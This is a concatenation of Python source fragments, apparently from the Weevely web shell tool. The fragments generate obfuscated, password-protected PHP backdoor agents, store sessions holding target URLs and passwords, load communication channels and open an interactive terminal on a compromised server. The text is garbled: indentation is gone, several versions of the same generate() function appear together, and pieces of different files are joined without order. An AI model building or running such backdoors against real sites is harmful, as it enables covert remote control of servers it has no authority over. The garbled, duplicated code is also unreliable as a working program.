def generate(password, obfuscator='obfusc1_php', agent='obfpost_php'):
obfuscator_path = os.path.join(obfuscators_templates_folder_path,
obfuscator + '.tpl')
agent_path = os.path.join(agent_templates_folder_path, agent + '.tpl')
for path in (obfuscator_path, agent_path):
if not os.path.isfile(path):
raise FatalException(messages.generic.file_s_not_found % path)
obfuscator_template = Template(filename=obfuscator_path)
try:
with open(agent_path, 'r') as templatefile:
agent = Template(
templatefile.read()).render(password=password).encode('utf-8')
except Exception as e:
raise FatalException(messages.generate.error_agent_template_s_s %
(agent_path, str(e)))
try:
obfuscated = obfuscator_template.render(agent=agent)
except Exception as e:
raise FatalException(messages.generate.error_obfuscator_template_s_s %
(obfuscator_path, str(e)))
return obfuscated
def __init__(self, dbpath, volatile = False):
try:
sessiondb = yaml.load(open(dbpath, 'r').read())
except Exception as e:
log.warn(
messages.generic.error_loading_file_s_s %
(dbpath, str(e)))
raise FatalException(messages.sessions.error_loading_sessions)
if sessiondb and isinstance(sessiondb, dict):
saved_url = sessiondb.get('url')
saved_password = sessiondb.get('password')
if saved_url and saved_password:
if not volatile:
# Register dump at exit and return
atexit.register(self._session_save_atexit)
self.load_session(sessiondb)
return
log.warn(
messages.generic.error_loading_file_s_s %
(dbpath, 'no url or password'))
raise FatalException(messages.sessions.error_loading_sessions)
def generate(password, obfuscator='obfusc1_php', agent='stegaref_php'):
obfuscator_path = os.path.join(obfuscators_templates_folder_path,
obfuscator + '.tpl')
agent_path = os.path.join(agent_templates_folder_path, agent + '.tpl')
for path in (obfuscator_path, agent_path):
if not os.path.isfile(path):
raise FatalException(messages.generic.file_s_not_found % path)
obfuscator_template = Template(filename=obfuscator_path)
try:
agent = Template(open(agent_path,
'r').read()).render(password=password)
except Exception as e:
raise FatalException(messages.generate.error_agent_template_s_s %
(agent_path, str(e)))
agent = utils.code.minify_php(agent)
try:
obfuscated = obfuscator_template.render(agent=agent)
except Exception as e:
raise FatalException(messages.generate.error_obfuscator_template_s_s %
(obfuscator_path, str(e)))
return obfuscated
def generate(password, obfuscator='obfusc1_php', agent='obfpost_php'):
obfuscator_path = os.path.join(obfuscators_templates_folder_path,
obfuscator + '.tpl')
agent_path = os.path.join(agent_templates_folder_path, agent + '.tpl')
for path in (obfuscator_path, agent_path):
if not os.path.isfile(path):
raise FatalException(messages.generic.file_s_not_found % path)
obfuscator_template = Template(filename=obfuscator_path)
try:
with open(agent_path, 'r') as templatefile:
agent = Template(templatefile.read()).render(password=password)
except Exception as e:
raise FatalException(messages.generate.error_agent_template_s_s %
(agent_path, str(e)))
minified_agent = utils.code.minify_php(agent)
# Fallback to vanilla agent if minification went wrong
agent = minified_agent if minified_agent else agent
try:
obfuscated = obfuscator_template.render(agent=agent)
except Exception as e:
raise FatalException(messages.generate.error_obfuscator_template_s_s %
(obfuscator_path, str(e)))
return obfuscated
def save_generated(obfuscated, output):
try:
open(output, 'w+').write(obfuscated)
except Exception as e:
raise FatalException(messages.generic.error_creating_file_s_s %
(output, e))
def __init__(self, url, password, channel_name=None):
"""
Import and instanciate dynamically the channel.
Given the channel object Mychannel, this should be placed
in module core.channels.mychannel.mychannel.
"""
if not channel_name:
channel_name = config.channel_default
module_name = channel_name.lower()
try:
# Import module
module = __import__('core.channels.%s.%s' %
(module_name, module_name),
fromlist=["*"])
# Import object
channel_object = getattr(module, channel_name)
except:
raise FatalException(messages.channels.error_loading_channel_s %
(channel_name))
# Create channel instance
self.channel_loaded = channel_object(url, password)
self.channel_name = channel_name
def _load_agents(self):
try:
agents_file = open(agents_list_path)
except Exception as e:
raise FatalException(messages.generic.error_loading_file_s_s %
(languages_list_path, str(e)))
return agents_file.read().split('\n')
def load_all_agents():
try:
agents_file = open(os.path.join(config.weevely_path, agents_list_path))
except Exception as e:
raise FatalException(messages.generic.error_loading_file_s_s %
(agents_list_path, str(e)))
return agents_file.read().split('\n')
def _load_languages(self):
try:
language_file = open(languages_list_path)
except Exception as e:
raise FatalException(core.messages.generic.error_loading_file_s_s %
(languages_list_path, str(e)))
languages = language_file.read().split('\n')
# Language list validation, every lower ascii starting letter should be
# covered
import string
for letter in string.ascii_lowercase:
if not any([l for l in languages if l.startswith(letter)]):
raise ChannelException(error_language_start_letter_s % letter)
return languages
def _load_referrers(self):
referrers_vanilla = []
try:
referrer_file = open(referrer_templates_path)
except Exception as e:
raise FatalException(core.messages.generic.error_loading_file_s_s %
(referrer_templates_path, str(e)))
for template in referrer_file.read().split('\n'):
if not template.startswith('http'):
continue
referer_format = FirstRefererFormat(self.url)
template_first_formatted = Template(template).render(
tpl=referer_format)
referrers_vanilla.append(
(template_first_formatted, referer_format.chunks_sizes))
return referrers_vanilla
def __init__(self, url, password, volatile = False):
if not os.path.isdir(sessions_path):
os.makedirs(sessions_path)
# Guess a generic hostfolder/dbname
hostname = urlparse.urlparse(url).hostname
if not hostname:
raise FatalException(messages.generic.error_url_format)
hostfolder = os.path.join(sessions_path, hostname)
dbname = os.path.splitext(os.path.basename(urlparse.urlsplit(url).path))[0]
# Check if session already exists
sessions_available = glob.glob(
os.path.join(
hostfolder,
'*%s' %
sessions_ext))
for dbpath in sessions_available:
try:
sessiondb = yaml.load(open(dbpath, 'r').read())
except Exception as e:
log.warn(
messages.generic.error_loading_file_s_s %
(dbpath, str(e)))
else:
saved_url = sessiondb.get('url')
saved_password = sessiondb.get('password')
if not saved_url or not saved_password:
log.warn(
messages.generic.error_loading_file_s_s %
(dbpath, 'no url or password'))
if saved_url == url and saved_password == password:
# Found correspondent session file.
# Register dump at exit and return
if not volatile:
atexit.register(self._session_save_atexit)
self.load_session(sessiondb)
return
# If no session was found, create a new one with first available filename
index = 0
while True:
dbpath = os.path.join(
hostfolder, '%s_%i%s' %
(dbname, index, sessions_ext))
if not os.path.isdir(hostfolder):
os.makedirs(hostfolder)
if not os.path.exists(dbpath):
sessiondb = {}
sessiondb.update(
{ 'path': dbpath,
'url': url,
'password': password,
'debug': False,
'channel' : None,
'default_shell' : None,
}
)
# Register dump at exit and return
if not volatile:
atexit.register(self._session_save_atexit)
self.load_session(sessiondb)
return
else:
index += 1
raise FatalException(messages.sessions.error_loading_sessions)
from core.terminal import Terminal
from core.weexceptions import FatalException
from core.loggers import log
from core.sessions import SessionURL, SessionFile
from core import modules
from core import messages
from core import config
import sys
import pprint
if __name__ == '__main__':
try:
if len(sys.argv) == 3 and sys.argv[1].startswith('http'):
session = SessionURL(url=sys.argv[1], password=sys.argv[2])
elif len(sys.argv) == 2:
session = SessionFile(sys.argv[1])
else:
log.info(__doc__)
raise FatalException(messages.generic.error_missing_arguments)
log.debug(pprint.pformat(session))
modules.load_modules(session)
Terminal(session).cmdloop()
except (KeyboardInterrupt, EOFError):
log.info('Exiting.')
except FatalException as e:
log.critical('Exiting: %s' % e)